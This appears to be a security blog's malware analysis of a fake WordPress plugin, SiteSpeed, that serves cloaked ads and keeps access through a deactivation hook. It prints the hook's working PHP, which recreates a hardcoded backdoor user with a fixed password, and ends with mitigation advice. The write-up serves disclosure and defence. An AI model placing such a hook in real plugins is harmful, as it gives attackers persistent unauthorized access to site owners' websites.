Fake WordPress plugins appear to be trending as an effective way of establishing a foothold on compromised websites.
During a recent investigation, we discovered a fake component which was masquerading as a legitimate plugin. Named SiteSpeed, it contained a lot of interesting malicious capabilities.
Unwanted Advertisements
The malicious plugin can be used by the attacker to display ads on the website. To avoid detection and target specific website visitors, the plugin has many functions to check the user-agent, referrer, and the IP of the user accessing the page. If a search engine is detected, then the ads will not be displayed — only regular users will see the advertisements from the website pages.
Backdoor Functionality
One interesting technique that this plugin leverages is revealed upon deactivation. If a website administrator decides to deactivate SiteSpeed from the WordPress website, the fake component executes a couple of malicious tasks to maintain unauthorized access.
Let’s take a look at the contents of sitespeed.php to see how it accomplishes backdoor functionality. We found this malicious file located within the plugins /wp-content/plugins/sitespeed/ directory.
function sitespeed_deactivate() { global $wpdb; $charset_collate = $wpdb->get_charset_collate(); $table_name = $wpdb->prefix . "sitespeed"; $sql = "DROP TABLE $table_name"; $wpdb->query( $sql ); $table_name = $wpdb->prefix . "sitespeedban"; $sql = "DROP TABLE $table_name"; $wpdb->query( $sql ); $user_name = 'pedro68'; $user_id = username_exists( $user_name ); if ( $user_id ) { wp_delete_user($user_id, 1); } wp_create_user( $user_name, 'zhano', $user_name . rand(1,10000) . rand(1,10000) . '@mailinator.com' ); delete_option( 'ads_enable' ); } if(function_exists('register_activation_hook')) { register_deactivation_hook( __FILE__, 'sitespeed_deactivate' ); }
First, the code checks for the existence of the username “pedro68” and removes it, reassigning all posts to the user_id = 1.
What this means is that, if malicious spam content has been injected by the attacker at any point post-compromise, those posts would still be on the website and appear under whichever user is assigned ID 1 — unless changed from default, this is ID typically associated with an initial administrative account, since IDs are assigned in a linear fashion.
Role Creation
Another interesting functionality includes role creation. By leveraging the wp_create_user() function, attackers create the user “pedro68” with the password “zhano” and a random email address containing digits:
wp_create_user( $user_name, 'zhano', $user_name . rand(1,10000) . rand(1,10000) . '@mailinator.com' );
Conclusion & Mitigation Steps
Hackers want to maintain unauthorized access for as long as possible, and they have a large number of tricks that they use to accomplish this.
Since malware can hide just about anywhere, it’s always worth checking your website’s plugins, existing users, theme files, or any other third-party extensible components for any indicators of compromise. You might just find an extra plugin that you don’t remember installing on your website which is acting as a backdoor.
Compromised websites can be used for a myriad of other malicious activities as well, ranging from DDoS and brute force attacks to spam mailings or malware distribution. Monitoring for access to your WordPress website, unauthorized user creation, and changes to active plugins are a great way to mitigate risk and detect a compromise.
To prevent infection, consider using a web application firewall to restrict unauthorized access and mitigate risk to your website.
Stephen Johnston
Denis Sinegubko
Daniel Cid
Ben Martin
David Dede